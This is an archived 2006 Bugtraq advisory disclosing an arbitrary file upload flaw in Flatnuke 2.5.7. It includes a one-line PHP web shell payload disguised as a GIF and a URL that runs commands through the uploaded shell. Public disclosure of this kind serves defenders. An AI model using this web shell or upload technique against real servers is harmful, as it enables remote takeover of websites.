| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060713170040.1874.qmail@securityfocus.com> Date: 13 Jul 2006 17:00:40 -0000 From: rgod@...istici.org To: bugtraq@...urityfocus.com Subject: flatnuke <= 2.5.7 arbitrary php file upload 12/07/200619.11.54 ----- Flatnuke 2.5.7 arbitrary file upload / remote code execution ------------- software: site: http://www.flatnuke.org/ -------------------------------------------------------------------------------- if user Gallery uploads are enabled (not the default) you can go to: http://[target]/[path_to_flatnuke]/index.php?mod=Gallery to upload a shell.php file, ex: GIF86<?php system($GET[cmd]);?> file is renamed like this: shell_by_[username].php now you can launch commands, ex: http://[target]/[path]/sections/Gallery/shell_by_rgod.php?cmd=ls%20-la -------------------------------------------------------------------------------- rgod site: http://rgod.altervista.org mail: rgod @ autistici.org -------------------------------------------------------------------------------- original url: http://retrogod.altervista.org/flatnuke257_adv.html
Powered by blists - more mailing lists